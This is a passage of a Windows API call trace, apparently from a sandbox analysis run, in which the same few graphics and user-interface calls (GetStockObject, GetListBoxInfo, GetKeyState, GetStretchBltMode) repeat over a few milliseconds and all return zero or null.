[0029.387] GetKeyState (nVirtKey=1) returned 0 [0029.387] GetStretchBltMode (hdc=0x1) returned 0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.388] GetKeyState (nVirtKey=1) returned 0 [0029.388] GetStretchBltMode (hdc=0x1) returned 0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.388] GetKeyState (nVirtKey=1) returned 0 [0029.388] GetStretchBltMode (hdc=0x1) returned 0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.388] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.389] GetKeyState (nVirtKey=1) returned 0 [0029.389] GetStretchBltMode (hdc=0x1) returned 0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.389] GetKeyState (nVirtKey=1) returned 0 [0029.389] GetStretchBltMode (hdc=0x1) returned 0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetStockObject (i=789644) returned 0x0 [0029.389] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.390] GetKeyState (nVirtKey=1) returned 0 [0029.390] GetStretchBltMode (hdc=0x1) returned 0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.390] GetKeyState (nVirtKey=1) returned 0 [0029.390] GetStretchBltMode (hdc=0x1) returned 0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetStockObject (i=789644) returned 0x0 [0029.390] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.390] GetKeyState (nVirtKey=1) returned 0 [0029.390] GetStretchBltMode (hdc=0x1) returned 0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetStockObject (i=789644) returned 0x0 [0029.391] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.391] GetKeyState (nVirtKey=1) returned 0 [0029.391] GetStretchBltMode (hdc=0x1) returned 0 [0029.391] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.391] GetKeyState (nVirtKey=1) returned 0 [0029.391] GetStretchBltMode (hdc=0x1) returned 0 [0029.391] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.391] GetKeyState (nVirtKey=1) returned 0 [0029.391] GetStretchBltMode (hdc=0x1) returned 0 [0029.391] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.391] GetKeyState (nVirtKey=1) returned 0 [0029.391] GetStretchBltMode (hdc=0x1) returned 0 [0029.391] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.391] GetKeyState (nVirtKey=1) returned 0 [0029.391] GetStretchBltMode (hdc=0x1) returned 0 [0029.391] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.391] GetKeyState (nVirtKey=1) returned 0 [0029.391] GetStretchBltMode (hdc=0x1) returned 0 [0029.391] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.391] GetKeyState (nVirtKey=1) returned 0 [0029.391] GetStretchBltMode (hdc=0x1) returned 0 [0029.391] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.391] GetKeyState (nVirtKey=1) returned 0 [0029.391] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.392] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.392] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.392] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.392] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.392] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.392] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.392] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.392] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.392] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.392] GetStretchBltMode (hdc=0x1) returned 0 [0029.392] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.392] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.393] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.393] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.393] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.393] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.393] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.393] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.393] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.393] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.393] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.393] GetKeyState (nVirtKey=1) returned 0 [0029.393] GetStretchBltMode (hdc=0x1) returned 0 [0029.393] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.394] GetKeyState (nVirtKey=1) returned 0 [0029.394] GetStretchBltMode (hdc=0x1) returned 0 [0029.394] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.394] GetKeyState (nVirtKey=1) returned 0 [0029.394] GetStretchBltMode (hdc=0x1) returned 0 [0029.394] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.394] GetKeyState (nVirtKey=1) returned 0 [0029.394] GetStretchBltMode (hdc=0x1) returned 0 [0029.394] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.394] GetKeyState (nVirtKey=1) returned 0 [0029.394] GetStretchBltMode (hdc=0x1) returned 0 [0029.394] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.394] GetKeyState (nVirtKey=1) returned 0 [0029.394] GetStretchBltMode (hdc=0x1) returned 0 [0029.394] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.394] GetKeyState (nVirtKey=1) returned 0 [0029.394] GetStretchBltMode (hdc=0x1) returned 0 [0029.394] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.394] GetKeyState (nVirtKey=1) returned 0 [0029.394] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.395] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.395] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.395] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.395] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.395] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.395] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.395] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.395] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.395] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.395] GetStretchBltMode (hdc=0x1) returned 0 [0029.395] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.395] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.396] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.396] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.396] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.396] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.396] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.396] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.396] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.396] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.396] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.396] GetKeyState (nVirtKey=1) returned 0 [0029.396] GetStretchBltMode (hdc=0x1) returned 0 [0029.396] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.397] GetStretchBltMode (hdc=0x1) returned 0 [0029.397] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.397] GetStretchBltMode (hdc=0x1) returned 0 [0029.397] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.397] GetStretchBltMode (hdc=0x1) returned 0 [0029.397] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.397] GetStretchBltMode (hdc=0x1) returned 0 [0029.397] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.397] GetStretchBltMode (hdc=0x1) returned 0 [0029.397] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.397] GetStretchBltMode (hdc=0x1) returned 0 [0029.397] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.397] GetStretchBltMode (hdc=0x1) returned 0 [0029.397] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.397] GetStretchBltMode (hdc=0x1) returned 0 [0029.397] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.397] GetStretchBltMode (hdc=0x1) returned 0 [0029.397] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.397] GetStretchBltMode (hdc=0x1) returned 0 [0029.397] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.397] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.398] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.398] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.398] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.398] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.398] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.398] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.398] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.398] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.398] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.398] GetKeyState (nVirtKey=1) returned 0 [0029.398] GetStretchBltMode (hdc=0x1) returned 0 [0029.398] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.399] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.399] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.399] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.399] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.399] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.399] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.399] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.399] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.399] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.399] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.399] GetKeyState (nVirtKey=1) returned 0 [0029.399] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.400] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.400] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.400] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.400] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.400] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.400] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.400] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.400] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.400] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.400] GetStretchBltMode (hdc=0x1) returned 0 [0029.400] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.400] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.401] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.401] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.401] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.401] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.401] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.401] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.401] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.401] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.401] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.401] GetKeyState (nVirtKey=1) returned 0 [0029.401] GetStretchBltMode (hdc=0x1) returned 0 [0029.401] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.402] GetStretchBltMode (hdc=0x1) returned 0 [0029.402] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.402] GetStretchBltMode (hdc=0x1) returned 0 [0029.402] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.402] GetStretchBltMode (hdc=0x1) returned 0 [0029.402] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.402] GetStretchBltMode (hdc=0x1) returned 0 [0029.402] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.402] GetStretchBltMode (hdc=0x1) returned 0 [0029.402] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.402] GetStretchBltMode (hdc=0x1) returned 0 [0029.402] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.402] GetStretchBltMode (hdc=0x1) returned 0 [0029.402] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.402] GetStretchBltMode (hdc=0x1) returned 0 [0029.402] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.402] GetStretchBltMode (hdc=0x1) returned 0 [0029.402] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.402] GetStretchBltMode (hdc=0x1) returned 0 [0029.402] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.402] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode (hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.403] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode (hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.403] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode (hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.403] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode (hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.403] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode (hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.403] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode 